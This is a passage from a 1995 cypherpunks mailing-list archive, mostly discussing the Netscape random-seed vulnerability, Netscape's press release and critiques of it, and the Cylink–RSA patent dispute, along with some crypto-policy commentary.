Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Sep 95 14:32:13 PDT
To: cypherpunks@toad.com
Subject: Una FTPaper 2
Message-ID: <199509192132.RAA04891@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain




     ftp.hacktic.nl/pub/incoming/unabomb.txt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 17:40:50 PDT
To: AndrewR@beetle.vironix.co.za (Andrew Roos)
Subject: Re: A Netscape Server implementation error
In-Reply-To: <305F486F@beetle.vironix.co.za>
Message-ID: <199509200035.RAA13361@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Hi Sameer
> 
> Thanks in advance for the T-shirt, and I like the Web site. On the   

	My pleasure. ;-)

> Although this is not nearly as important a result as Ian and Davids, it   
> is the first server hack, so can I have another T shirt?  :-)


	But you're already getting a T-shirt. (This looks like a place
where a 'nym could come in handy ;-) I've done a little bit more in
terms of outlineing the requirements to win a t-shirt on the web page--
actual working code is an important criterion.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Tue, 19 Sep 95 17:52:35 PDT
To: cypherpunks@toad.com
Subject: Netscape on randseed issue
Message-ID: <v03003201ac8514fbce6d@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


Netscape has put up an official response to the randseed issue:

<http://home.netscape.com/newsref/std/random_seed_security.html>

Most interesting to me was the para:

"Netscape has also begun to engage an external group of world-class
security experts who will review our solution to this problem before it
is sent to customers. These experts will validate Netscape's solution
and insure that it is complete and effective in solving this
vulnerability. The group will be used on an ongoing basis to work with
Netscape's internal security experts to review the design and
implementation of security in Netscape's products and to provide an
additional measure of assurance that these products implement the
highest levels of security possible."

Anyone know anything about this group, or is this a reference to the
RSADSI source review that Andrew Loewenstern mentioned earlier today?


________________________________________________________________________
Stephan Somogyi            Think Tank Grenadier            Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 19 Sep 95 09:55:48 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <155.9509191654@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:
> Jeff Weinstein <jsw@neon.netscape.com> writes:
> >    Regardless of what Markoff implies, we do not intend to depend
> >  on security through obscurity.
> 
> Oh, can we now expect to see source to at least the security portions of  
> Navigator and the Commerce server?

An excellent proposal.

Well how about it Jeff/netscape?

Save Ian and David the effort of reverse engineering it again (which
it is obviously pointless, and more: mathematically impossible, to do),
and get your self some free advice.  Better to have free advice, and
quickly now, rather than another disaster later, presume netscapes
cred can't take too many more bashings before this starts affecting
share prices etc.

Posting the code for the random number generator would be an excellent
start.  Kirkov (sp?) principle and all.  Or if that doesn't sit well
with copyright interests, how about writing up an open spec about how
the random number generator works?  Then we can critique it.  An
algorithm should be something to be proud of, "it's secure, and see:
this is how it works, here are the design criteria, here is how you
would attempt to break it, and here is the best predicted attack's
cost."

Lets get something useful out of this, an open system is called for
not just a quick switcheroo of another algorithm.  Open systems, rule!
(I thought netscape was big on open systems, reading some of the
blurb, just now).

I'm sure you'd get some useful, valuable feed back from publishing an
open spec, is netscape still a progressive startup company with hot
programmers running the show, or has it slipped into stuffy corporate
realms already?

Respectfully,

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Tue, 19 Sep 95 14:56:15 PDT
To: rsalz@osf.org>
Subject: Re: Netscape's random numbers
Message-ID: <9508198115.AA811559884@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain



      Congrats, nice job!
      
      The Netscape license explicitly prohibits decompiling (except where such 
      prohibition is illegal).  When this hits the media it will be important to 
      avoid being tarred with the "hacker breaks rules and breaks in" brush. 
      More subtly, it's probably a bad idea to call into question the overall 
      business model of client binaries on the net.
     
So.  At least they're honest and let everbody know.


      Instead, emphasize importance of open code, public reviews, ability to 
      link in your own code that meets public specs, etc.  All of these things 
      the Internet was designed to do, and U.S. ITAR regulations are designed to 
      prohibit (globally, anyway).  And also that the bad guys will never play 
      by the rules.  And re-emphasize that solutions are possible, just that the 
      U.S. government prevents them from being deployed in a global economy.
      
      
Here, here!

      Perhaps draw parallels to the recent Microsoft Word virus.
      
      /r$
      
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=

W.S. "Skip" Harborth
Manager & Senior Engineer
Information Systems Security Engineering
Houston Associates,  Incorporated
4601 North Fairfax Dr, Suite 1001
Arlington, Virginia  22203    USA
(703) 284-8732     812-5099 (fax)
sharborth@hai-net.com


The opinions expressed are my own and have no relation to my employer.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 19 Sep 95 10:14:30 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <Pine.3.89.9509191823.A881-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995, Brian Davis wrote:

> Phill obviously presents one point of view, vigorously and well.  What do 
> the rest of you think about a teen who, say, busts into a .edu site, 
> plays with the files, and ultimately brings the system down entirely for 
> 36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
> him?  Have a TLA hire him???

If it wasn't for ITAR the Net would already have secure encryption and
authentication, and most such hacker attacks would be impossible (or at 
least impractical).

		Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 19 Sep 95 20:14:06 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: FROM A FRIEND . . .
Message-ID: <Pine.SUN.3.91.950919182936.7667A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here is a press release that Netscape has issued (is about to 
issue?) concerning their recent miscue.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
*********************************************************************

Potential Vulnerability in Netscape Products - Netscape Responding
Immediately To Upgrade Customers and Minimize Risk of Future Threats

Summary:
During regular monitoring of Internet security newsgroups, Netscape has
discovered a potential vulnerability in the current version of the Netscape
Navigator. Late Sunday evening two UC-Berkeley students posted a message to
the Internet detailing their efforts to reverse engineer some security
capabilities of the Netscape Navigator. Their efforts revealed how the
program generates session encryption keys, enabling them to replicate these
keys with a moderate amount of computing power and decipher messages sent
across the Internet. The potential vulnerability has since been confirmed by
Netscape engineers. With this knowledge an experienced computer programmer
could decrypt messages sent by Netscape Navigator to other computers in a
few hours of computation time.

Netscape secure software has been in use for almost a year on the Internet
by millions of customers and no thefts of actual customer information
protected by our security have been reported. This posting on the Internet
reported a potential vulnerability, not the actual theft of customer
information. Netscape plans to address this vulnerability
quickly by providing updated software as soon as possible via
the Internet. An updated version of Netscape Navigator 1.1 and 1.2 will be
available for downloading on the Internet next week by existing customers.
In addition, Netscape Navigator 2.0, which was announced yesterday and will
be available next week in beta versions, includes this imporvement as well
as a number of additional security features.

Detailed Issue:
Current versions of Netscape Navigator use  random
information to generate session encryption keys of either
40-bits or 128-bits in length. The random information is found
through a variety of functions that look into a user's machine
for information about how many processes are running, process
ID numbers, the current time in microseconds, etc. The current
vulnerability exists because the size of random input is less
than the size of the subsequent keys. This means that instead
of searching through all the 2^128 possible keys by brute
force, a potential intruder only has to search through a significantly smaller
key space by brute force. This is substantially easier problem to solve
because it takes much less compute time and means
40-bit or 128-bit key strength is substantially reduced.

Solution:
Netscape is already implementing a fix to the specific portion of our
software where this vulnerability exists. We plan to address
the problem by significantly increasing the amount of random information
that cannot be
discovered by external sources from approximately 30-bits to approximately
300-bits. In addition, the random information will be made much more
difficult to replicate because we will greatly expand the techniques and
sources used to generate the random information. Once this improvement is
made, protection of the random information will be as strong as the rest of
the security built into
Netscape.

Netscape has also begun to engage an external group of world class security
experts who will review our solution to this problem before it is sent to
customers. These experts will validate Netscape's solution and insure that
it is complete and effective in solving this vulnerability. The group will
be used on an ongoing basis to work with Netscape's internal security
experts to review the design and implementation of security in Netscape's
products and to provide an additional measure of assurance that these
products implement the highest levels of security possible.

This discovery does not affect the strength or security
of  SSL, RC4, or any other portions of our security
implementations. The fix will restore Netscape security across all products to
the true 40-bit level for Export and true 128-bit level for U.S.
Customers intended before this discovery. Current versions of Netscape
Navigator should be replaced with updated
versions that will be made available next week. In addition, the
current version of the Netscape Commerce Server has a similar vulnerability
during it's initial key-pair generation. Therefore, a patch will be made
available from Netscape and should be applied by Commerce Server customers
to generate a new key pair and server certificate.

Updating Customers:
Netscape will provide the fix for Export (40 bit) versions of Netscape
Navigator later this week for downloading by customers on the Internet.
Similarly, the
Commerce Server patch for Export versions (40 bit) will be made available
from our home page. Because downloading of 128 bit versions of the software
is still not permitted by U.S. law, U.S. customers of Netscape Navigator,
Netscape Navigator Personal Edition and Netscape Commerce Server using 128
bit versions can request the replacement from Netscape for delivery through
the regular mail.

For additional information or replacements for 128-bit versions of software
that you have already purchased, please call the Netscape Replacement Desk
at 415-528-3600, email replace@netscape.com, or contact your existing
Netscape representative
directly. We will inform you immediately when the updated software is
available for download.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 19 Sep 95 11:08:54 PDT
To: andrew_loewenstern@com.swissbank.us.il
Subject: Re: NYT on Netscape Crack
In-Reply-To: <9509191738.AA00941@ch1d157nwk>
Message-ID: <429.9509191807@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:
> Ian posted the code for the PRNG on August 30th and Stephen Kapp
> noted that it was similar to one in RSAREF.  The PRNG is probably
> fine.  

Yeah I saw both.

> The big flaw here was the collection of seed material.  

This was what I was trying to say.  I was thinking that it would be
useful if they would care to disclose this part of the implementation,
where the entropy comes from, and how they estimate it.

> The bottom line is the WHOLE security subsystem should be published
> for analysis.

Absolutely, but can you see netscape adopting the GPL, with full
source availability?  Of course this would be ideal, but I was hoping
for at least the source as pertaining to the random number generator
which is the essence of the current problem.

> > Or if that doesn't sit well with copyright interests, how about
> > writing up an open spec about how the random number generator works?
> > Then we can critique it.
> 
> Netscape did this with SSL and what happened was the rest of the industry  
> jumped on it before any analysis was done.  Now we are likely stuck with a  
> poor protocol.

Yeah well if open systems is taken to mean, we make up a standard,
tell you about it and if you don't like it well it's too late because
we've blasted it across the internet to the extent that there's no
turning back.

An approach more in keeping with the IETF frame work would have been
better.  If it's open standards why not accept existing standards, or
contribute to a IETF working group to decide one which is agreed upon.
I'd call that more open.

> > An algorithm should be something to be proud of, "it's secure, and
> > see:  this is how it works, here are the design criteria, here is
> > how you would attempt to break it, and here is the best predicted
> > attack's cost."
>
> The design may be great, but if the implementation is flawed then
> you aren't much better off.  To attempt to evaluate the security of
> a system you need to be able to inspect the implementation.  Period.

Well yes, but the current flaw the design wasn't even correct,
although the implementation of that design was.  Both would be ideal
but a design and proof of having audited it would be good if they are
expecting people to trust this thing for megabucks as internet
commerce takes off.

> Netscape may have hot programmers but so far I believe it has become
> self-evident that they know little about crypto and implementing
> cryptosystems.

yup.

> To Netscape's credit, Jeff Weinstein claims that the team
> implementing the security for Navigator 2.0 is completely new and of
> course Netscape has hired Tahir ElGamal, who certainly knows what he
> is doing.  Additionally I would suspect that with all the bad
> publicity they are receiving they would take up Bidzos on RSADSI's
> offer to analyze the source.  So it is entirely possible that
> Navigator 2.0 will be much better.  However, I am not holding my
> breath.

Well I highly doubt they'd GPL the code.  Or even make the code
available.  But it would be really, really nice if a fresh outlook was
taken on this, code is required to trust the thing, as that shows a
willingness to expose the workings, and confidence in the
implementation, and algorithms.  I hope some serious thought goes into
this issue at netscape, about giving out code for their security
implementation.

There are still possibilities for server bugs, and so on.

> Strong crypto is _hard_ to implement properly.  Even if a product is
> using a well-known algorithm there could be any number of subtle
> flaws that can destroy any security offered by such algorithm.  You
> can't just toss in RSA, IDEA, RC-4, DES, etc... and claim the thing
> is secure.

No, you can't.

Sadly, I presume that they have no intention of releasing source.  So
we'll have to be content with RSADSI security audit.  Or another
break.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 19 Sep 95 03:16:22 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <43lu3k$7q6@tera.mcom.com>
Message-ID: <Pine.SOL.3.91.950919185921.17727B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Sep 1995, Jeff Weinstein wrote:

> In article <199509190355.XAA01329@frankenstein.piermont.com>, perry@piermont.com (Perry E. Metzger) writes:
> > I suspect that there are far more flaws in Netscape. String buffer
> > overflows are another good guess here -- they are probably rampant
> > through the code both for the browser and the commerce server they
....
>   Sigh.  For your information the security code for 1.x versions of
> netscape was not even written by someone from NCSA.  The current
> security team (which does not include the person who did the 1.x
> version) also does not include anyone from NCSA.  While I can't

I will defend Netscapes code on the point about the RNG even though I 
have not seen any.  I assume the Netscape code is quite large and each 
release would have to pass various fuctionality tests.  How can you test 
that the RND seeding is wrong?  You have to actually look at the code, the 
number coming out are still random.  As of last week I was told by
Mike_Spreitzer.PARC@xerox.com that the random number generator seed 
routine in my DES library was only copying in 4 bytes of passed data 
instead of 8.  Given des_cblock data;, it was

memcpy(init,data,sizeof(data));

it should have been

memcpy(init,data,sizeof(des_cblock));

Rather hard to notice unless you know that des_cblock is passed as a 
pointer and even this can be compiler dependent.

Now I had not noticed this, my library runs like a charm and things 
appear random from the random number generator.  This sort of error can 
only be checked by reading the code and specifically looking at critical 
routines like this the RNG seeding routines.  The advantage of my code 
being public is that some-one like Mike can have a look and pick up 
problems like this.
The moral of the story I suppose is to be 
paranoid about checking routines relating to RNG.

What would be interesting is to see if packages like PEM use 
similar simple systems for generating random data.  Any of the systems 
that do digital envelopes are relying on libraries to provide random data 
for encryption keys.  At least with the old 'enter passwd' type 
encryption there was a bit of secret random data coming from a human, 
pitty about packet watchers seeing those characters as they fly over the 
net :-)

eric (who has also been burned by dodgy RNG seed routines in the past and
      so now uses a rather extrem system involving MD5 and lots of state :-).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 19 Sep 95 17:33:44 PDT
To: cypherpunks@toad.com
Subject: New Kid On The Block
Message-ID: <Pine.SUN.3.90.950919193110.24166C-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain




Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

---------- Forwarded message ----------
Date: Tue, 19 Sep 95 14:25:20 PDT
From: Bob Williams <bobw@netmanage.com>
To: "Larry J. Hughes Jr." <hughes@indiana.edu>,
    Adam Shostack <adam@bwh.harvard.edu>
Cc: ssl-talk@netscape.com
Subject: Re: details on security bug? 

The problems with SSL extend beyond the random
number generation hole widely publicized in the press today.

SSL 2.0 poses both financial and interoperability barriers
to widespread use of Cryptography that will be addressed
in the very near future.
 

-------------------------------
NETMANAGE, Inc.
Press Release
FOR IMMEDIATE RELEASE

Contact: Donna Loughlin, NetManage, (408) 973-7171
              Donna@netmanage.com

NetManage Licenses Public Key Cryptography from CYLINK

The Two Firms to Promote an Open Interface for Internet Security which 
Corrects Flaws and Eliminates Financial and Interoperability Barriers for 
Cryptography.

Cupertino, California - September 19,  1995- NetManage, the leader in TCP/IP 
Applications for Windows and Internet productivity software, announced today 
that is has signed a licensing agreement with CYLINK Corporation for 
technology which incorporates the fundamental patents covering public 
key cryptography.   NetManage will be providing support for public key 
authentication and data encryption as a fundamental component of its 
Chameleon Enterprise strategy.  The two firms further announced that they 
plan to provide support for an open interface for Internet security which 
will address recent flaws found in cryptographic implementations used by 
Netscape Communications and other unpublicized security holes in existing 
Internet security protocols. The standard is further intended to eliminate 
the financial and interoperability barriers that have been holding back 
widespread use of public key cryptography on the Internet.

In a separate announcement released yesterday, CYLINK announced that it had 
prevailed in a patent lawsuit with RSA Data Security which found that RSA 
had infringed U.S. patents held by CYLINK which cover all known 
implementations of public key technology.

About Internet Security
-----------------------
Establishing a secure Internet connection requires any computer software 
program to perform two functions: Authentication of the user, and bulk 
encryption of data.  

The Authentication phase allows two computers to verify that each party is 
who they claim to be, and that they are authorized to enter into a secure 
communications session.   This is done via "public key" technology, which 
was developed and patented originally by Stanford University and licensed 
exclusively by CYLINK Corporation.

During the authentication phase the two computers also agree upon the 
encryption method to be used for bulk data transfer during the time the two 
computers are communicating data between one another.  These ciphers can be 
implemented in either software or hardware, including PCMCIA cards.  Popular 
encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and 
RC-4 and are available from a variety of software and hardware vendors.

Limitations of Current Internet Security Standards
--------------------------------------------------
Current implementations of security protocols proposed as standards by 
Netscape Communications and RSA Data Security, Inc. include security flaws 
and fail to fully accommodate open and interoperable secure communications 
between computers which use different bulk encryption ciphers.  These 
problems have limited the adoption of Internet security as a widespread 
interoperable feature of all Internet software and hardware products 
including end-user applications, servers, firewalls, and secure routers.

NetManage and CYLINK, along with other major software and hardware 
developers, will be announcing next week the release of a publicly available 
security implementation which allows for 'plug & play' interoperability for 
users of Internet security, and the endorsement of protocol extensions which 
improve the reliability of current proposed Internet security standards.  
This open implementation will not lock software or hardware developers into 
the use of encryption technology from any one vendor.

Related APIs, key exchange technology, and encryption will be made publicly 
available to other software and hardware developers.   Licensing will 
include source code and no per-copy royalty fees.

About NetManage
---------------
NetManage Inc., the fastest growing software company in the United States, 
develops markets and supports an integrated set of Internet-based 
applications, servers and development tools for Microsoft Windows, Windows 
95 and Windows NT.  NetManage software allows corporations to facilitate 
communication, sharing of information and collaboration between workgroups 
using Internet technology. The company's award winning products include 
Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose 
shares are traded on the NASDAQ under the ticker symbol NETM.  Its products 
are sold world-wide by NetManage's direct sales force and authorized channel 
partners.

About CYLINK
------------
CYLINK Corporation is the world's largest provider of enterprise-wide 
network information security products and wireless communications.  CYLINK 
is the exclusive holder of the fundamental patents which broadly claim the 
invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and 
Helman-Pohling) and which were originally developed at Stanford University.  
Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, 
financial institutions and government agencies.  Licensees of CYLINK 
technology include CISCO Systems, and other prominent hardware and software 
developers.

# # #






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 19 Sep 95 16:46:58 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
Message-ID: <199509192342.TAA25539@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

>> If the "flaws" are being found by our group, as John notes, just what is
>> the NSA doing in the _second_ role it is supposed to have, it's "COMSEC,"
>> or communications security, role?

and then Thomas wrote:

>Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow 
>mechanisms ;)
>
>"I'm from the NSA, I'm here to help your crypto..."

In the relatively short time I've been on this list, Cypherpunks
have bruted, and then found a weakness in, two kinds of Netscape
software.
[A fine public service, IMO. Congrats to all involved.]

I don't expect to know NSA's specific brute-force capability, but
does anyone know if the NSA has *ever* found a glaring weakness in
software and then told its author(s) or owner(s) about it? Do "we"
perform the "COMSEC" role Tim was speaking of better than the NSA?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMF9VHW1lp8bpvW01AQFZkwQAiQWJMfdP+5v0CozYH59ZGWUhpaKxgX15
vdVCdSzHgaN6sj5aLVL4yRI0bkVe/6nJ8I4Nj9cYS5K5AgbcmiRDLvEulc0Y+mwr
B9rQBUcX7hM6lA+tEk2UpiGmR1xdh2U0Qpu93zT8T7MZtIc5dRReKeT21OXl4W96
NX4iONaceGY=
=2nmI
-----END PGP SIGNATURE-----
Regards, Jim Ray

"Censorship reflects society's lack of confidence in itself. It is
a hallmark of an authoritative regime." --  Justice Potter Stewart 
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 19 Sep 95 11:09:19 PDT
To: cypherpunks@toad.com
Subject: Re: (Yet Another?) Netscape Crack Web page
In-Reply-To: <9509191431.AA23188@hplyot.obspm.fr>
Message-ID: <9509191808.AA24749@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



 >   http://hplyot.obspm.fr/~dl/netscapesec/

I have designed and added what I consider a nice looking logo for that
page, have a look :-)

{I'm not an artist though, but xv, xpaint and patience can make wonders}

Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 20:41:04 PDT
To: cypherpunks@toad.com
Subject: response to netscape's press release
Message-ID: <199509200336.UAA28871@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I plan on releasing a press release regarding the misleading
statements made by Netscape in their statement about the seed bug,
announcing the web page describing my objections in detail. The document is
http://www.c2.org/hacknetscape/critique.phtml detailing my objections
to their statements.. I would appreciate comments, corrections, and
criticisms. Thanks.
	(The press release will not be written in the style of the web
page. ;-)


                             IN REPLY TO NETSCAPE

   Netscape announced that they are going to "fix" the problem. In
   traditional Internet style, I will respond to their post.

With this knowledge, an experienced computer programmer could decrypt
messages sent by Netscape Navigator to other computers in a few hours
of computation time.

   "a few hours"? Ian and David's program generates keys in 25 seconds.

The random information is found through a variety of functions
that look into a user's machine for information about how many
processes are running, process ID numbers, the current time in
microseconds, etc.

   Specifically, the Parent Process ID, the Process ID, and the time in
   microseconds. See the exploit code for more details.

The current vulnerability exists because the size of random input is
less than the size of the subsequent keys.

   The vulnerability exists because the random input isn't random. Since
   when is the time "random"? I'm sure a few physicists would love to see
   your theories on that one. (Berkeley Standard Time notwithstanding)

Once this improvement is made, protection of the random information
will be as strong as the rest of the security built into Netscape
Navigator.

   That's not saying much, considering that the security community has
   not had a chance to independently verify the security in Netscape
   Navigator.

Netscape has also begun to engage an external group of world-class
security experts who will review our solution to this problem before
it is sent to customers.

   So after someone violates Netscape Navigator's security do they decide
   to have an external group verify their code. (Note that they still
   don't plan on making it available for the security community at large
   to review). According to RSADSI's Jim Bidzos, his company offered to
   review Netscape's security when it was first introduced, but Netscape
   declined. "They're asking us to review it this time," he said.

This discovery does not affect the strength or security of SSL (Secure
Sockets Layer), RC4, or any other portions of our security
implementations.

   True, but this implies that SSL is a secure protocol, which has been
   shown to be false.

   At the beginning of their release:

Netscape secure software has been in use for almost a year on the
Internet by millions of customers and no thefts of actual customer
information protected by our security have been reported - this
posting on the Internet reported a potential vulnerability, not the 
actual theft of customer information.

   Yes, Netscape is very lucky that Ian and David are students, and not  
   criminals. I sincerely hope that the next time someone finds a hole in
   Netscape that it's someone who would rather win a free T-shirt than  
   steal lots of money.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 19 Sep 95 17:37:33 PDT
To: cypherpunks@toad.com
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <9509191440.AA18495@tis.com>
Message-ID: <9509200037.AA01721@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I can second that notion. There are a good many people
in all sorts of sectors of the government who can easily
be brought to frothing over Mr. Freeh & his pals at the NSA's
position on weak security systems. They like weakness, and
anyone with two brain cells to rub together who's interested
in good security rather rapidly end up coming to the
conclusion that the FBI and the NSA aren't doing them any
real favors.

Basicly IMHO, Tim May called it right when he said they're more
interested in snooping than securing. I've belived that
for a long, long time now. It still manages to annoy me
seriously whenever I think about it.

The vulnerabilities that most military systems suffer from
are both staggering and frightening, and it is criminal
that the NSA has so seriously abrogated it's security
role in the public and private sectors. I personaly belive
it's going to take a rather massive info-terrorist
attack before the control-freak crowd that's driving
weak security takes a back seat. Worms from Lybian
programmers anyone?

Strong cryptographic systems are an integral part of
strong security systems. The recent netscape crack
shows why you can't have one without the other pretty
well.

If good security means cedeing some percived control
over your populace, you should probably be examining
wether your populace wanted your to control them in
the first place it seems to me.

Unfortunalty the anti-security crowd is firmly in control
of the organs of the government, and does a damn good job
spreading it's propaganda to dupes in the press. Stuff
like the recent kneejerk "CyberPorn" crap and governmental
actions & reactions in that area towards limiting civil
liberties and security technology are great examples of it.

Meanwhile, I think the US is starting to slip behind the
curve in software technology for encryption & the like...
This will probably prove intresting in the future, especialy
if the CPU tossed at key escrow & the like turns up more
surprises.


Tim Scanlon


________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Standing Turtle <standing.turtle@internetmci.com>
Date: Tue, 19 Sep 95 17:50:37 PDT
To: cypherpunks@toad.com
Subject: Public Key Partners Dissolved!!!!!
Message-ID: <01HVH2IN4TDE8WWXN7@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain




CYLINK CLAIMS SHARE OF RSA TECHNOLOGY
An arbitration ruling has awarded Cylink Corp. control over two Stanford
University patents on public-key encryption technology used by RSA Data
Security Inc. following the dissolution of the companies' five-year
partnership.  Cylink says it plans to seek royalties from companies that
have licensed the software code from RSA and are redistributing it.  The
arbitrators ruled that RSA's right to sublicense the software expired in
1990.  (Wall Street Journal 19 Sep 95 B7)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 19 Sep 95 20:59:31 PDT
To: cypherpunks@toad.com
Subject: PGP back in legal limbo?
Message-ID: <9509200359.AA07322@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> WSJ, Sept 19, 1995.
 
> Cylink Claims Right To Key Technology Involving
> Encryption
 

> ... The arbitrators
> ruled that RSA hasn't had the right to sublicense the
> Stanford patents since 1990.


>Since PKP (and Bidzos, now president of
>RSA) always said that DH covered all public key encryption,
>it would seem that any RSA licensee would also need a license
>from Cylink.


So, I suppose this invalidates the RSA agreement that allows PGP to 
be distributed?  What "fortunate" timing for the pro GAK folks! Okay,
everybody in US, erase your copies, before the Feral government comes 
to get you.......
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 19 Sep 95 18:14:07 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Change of address {No crypto content}
Message-ID: <Pine.SUN.3.91.950919211107.21745A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just to announce that I have a new address.  No more VAX/VMS, hello Unix.
Donations of nice procmail files, and unix hints for the re-clueless 
(I last had an account on a Unix machine in 1980), most welcome.

If you send me mail in the next few days and I don't reply, it's either 
because I fiddled wrong, or because I couldn't find a terminal in Pittsburg.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | PLEASE NOTE NEW E-MAIL:
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | 
Coral Gables, FL 33124 USA | It's hot here.  
A HOME AT LAST: http://viper.law.miami.edu/~froomkin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
